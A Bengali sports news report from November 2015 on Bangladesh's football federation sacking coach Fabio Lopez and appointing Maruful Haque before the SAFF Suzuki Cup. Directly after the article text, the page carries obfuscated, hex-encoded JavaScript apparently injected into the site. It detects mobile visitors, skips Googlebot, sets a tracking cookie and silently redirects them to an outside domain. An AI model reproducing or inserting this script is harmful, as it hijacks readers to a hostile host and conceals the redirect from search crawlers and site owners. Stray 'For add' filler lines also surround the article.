for Add
: ২৭ নভেম্বর ২০১৫, শুক্রবার, ১৯:২০:০৭
নিজস্ব প্রতিবেদক : ছিলেন ইতালির ফ্যাবিও লোপেজ। আগামী সাফ সুজুকি কাপ পর্যন্ত তারই দায়িত্বে থাকার কথা ছিল জাতীয় ফুটবল দলের প্রধান কোচের। সেভাবেই তার চুক্তি হয়েছিল বাফুফের সঙ্গে। কিন্তু এ ইতালিয়ানের পারফরম্যান্সে সন্তুষ্ট হতে না পেরে তাকে বরখাস্ত করেছে বাফুফে। জাতীয় দলের নতুন কোচ নিয়োগ দেয়া হয়েছে মারুফুল হককে। দেশের অন্যতম এ অভিজ্ঞ কোচ এই প্রথম পেলেন লাল সবুজদের দায়িত্ব। আগামীকাল (শনিবার) সাফের প্রাথমিক দল ঘোষণার মধ্যদিয়ে বাংলাদেশ ফুটবলে শুরু হচ্ছে মারুফুল যুগ।
উপমহাদেশের প্রথম এবং একমাত্র উয়েফা ‘এ’ ক্যাটাগরি লাইসেন্সপ্রাপ্ত কোচ মারুফুলের জন্য জাতীয় ফুটবল দলের প্রধান প্রশিক্ষকের দায়িত্ব পাওয়াটা অনেকটা অপ্রত্যাশিতই বটে। আর যে দায়িত্ব পেয়েছেন, সেটা খুবই গুরুত্বপূর্ণ। ব লতে গেলে একপ্রকার ‘অগ্নিপরীক্ষা’ই বটে। পরীক্ষার নাম ‘সাফ সুজুকি কাপ।’ দায়িত্ব বুঝে পাওয়ার পর মারুফুল সাফের জন্য প্রস্তুতি নিতে সময় পাবেন মাত্র এক মাস। মারুফুলের আগে সর্বশেষ দেশীয় কোচ ছিলেন সাইফুল বারী টিটু।
মারুফুলের প্রথম পরীক্ষা সাফ সুজুকি কাপ দিয়ে। বাফুফের সঙ্গে চুক্তির আগেই শুক্রবারই চীনে খেলতে যাওয়া দলের বাইরে থাকা ৯ ফুটবলারকে নিয়ে অনুশীলনে নেমে পড়তে দেখা গেছে তাঁকে। বাফুফে জানিয়েছে সাফে ভাল করতে মারুফুলকে দল নির্বাচনে পূর্ণ স্বাধীনতাই দেবে তারা। প্রাথমিক ক্যাম্পে ৫০ ফুটবলারকে নেবার কথা রয়েছে। মারুফুলের সঙ্গে বাফুফের আলোচনা চলছে বেশ কদিন হলো। কাদের নিয়ে সাফে ভালো করা যায় সেটা হয়তো মনে মনে ছক কষে রেখেছেন মারুফুল। তাই দলের বাইরে থাকা এমিলি-নাসিরদের ফিটনেস ধরে রাখতে নিয়মিত অনুশীলন চালিয়ে যেতে আগেই বলে রেখেছিলেন তিনি। আজ (শুক্রবার) সকালে বুয়েট মাঠে জাতীয় দলের বাইরে থাকা ৯ ফুটবলারের ফিটনেসটা একটু ঝালিয়ে দেখেন ২০১২-১৩ মৌসুমে শেখ রাসেল ক্রীড়া চক্রকে কোচ হিসেবে ‘ঐতিহাসিক’ ট্রেবল জেতানো মারুফুল। এ বিষয়ে মারুফুল হক বলেন, ‘আসলে এটা কোন অফিশিয়াল অনুশীলন না। আমার মনে হয়েছে ওদের জাতীয় দলে খেলার যোগ্যতা আছে। তাই ওদের ডেকেছি। তাদের নিয়ে আমার কিছু কাজ ছিলো। এই কাজগুলো করলাম।’ রবিবার থেকে শুরু হবে জাতীয় দলের ক্যাম্প। দলের সমন্বয় আর ফিটনেসের ঘাটতিগুলো পুষিয়ে নিতে প্রথম ১৫ দিন বিল্ডআপ ট্রেনিং করাবেন মারুফুল। প্রথম এক সপ্তাহ দুই সেশন করে শুরু হবে। তারপর দল ছোট করে আনা হবে। এরপর থেকে এক সেশন করে সাফের আগ পর্যন্ত অনুশীলন চলবে বলে জানিয়েছেন মারুফুল।
প্রস্তুতির স্বল্প সময় প্রসঙ্গে মারুফুল বলেছেন, ‘এই দলটি খেলার মধ্যেই আছে। প্রীতি ম্যাচের প্রয়োজন দেখছি না। তারপরও প্রয়োজন মনে করলে স্থানীয় কোন দলের সঙ্গে কিছু ম্যাচ খেলা যেতে পারে। অনুশীলনে টিম কম্বিনেশন ঠিক করার জন্য নিজেদের মধ্যে ভাগ করে খেলা হবে।’
পেটে টিউমারের অপারেশন হওয়াতে ডাক পেয়েও বিশ্বকাপ বাছাইয়ের দলে থাকতে পারেননি ফরোয়ার্ড জাহিদ হাসান এমিলি। তবে চট্টগ্রামে শেখ কামাল আন্তর্জাতিক ক্লাব কাপ ফুটবলে খেলেছেন। তাই খেলার মধ্যেই ছিলেন। তারপরও কিছুটা ফিটনেসের ঘাটতি রয়েছে। সেগুলো সেরে নিতেই নিয়মিত অনুশীলনের মধ্যে রয়েছেন বলে জানালেন তিনি, ‘মারুফ ভাই বেশ কিছুদিন আগেই আমাদের বলে রেখেছিলেন ট্রেনিংয়ের ভেতরে থাকতে। আমরা যারা জাতীয় দলের বাইরে ছিলাম তাদের ফিটনেসে কিছু সমস্যা আছে। তাই একটু আগে থেকে শুরু করা।’
বাংলাদেশের জন্য সাফ চ্যাম্পিয়নশীপ সব সময়ই মর্যাদার লড়াই। গুরুত্বপূর্ণ এই টুর্নামেন্টের আগে মারুফুল হককে কোচ হিসেবে পেয়ে খুশি দলের ফুটবলাররা। শুক্রবার বুয়েট মাঠে অনুশীলন করেছেন জাহিদ হাসান এমিলি, রেজাউল করিম, মাজহারুল ইসলাম হিমেল, নাসিরউদ্দিন চৌধুরী, ইয়ামিন মুন্না, ফয়সাল মাহমুদ, সোহেল রানা, আতিকুর রহমান মিশু এবং জুয়েল রানা। ক্যাম্পে যোগ দেবার কথা রয়েছে উইঙ্গার জাহিদ হোসেনেরও।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add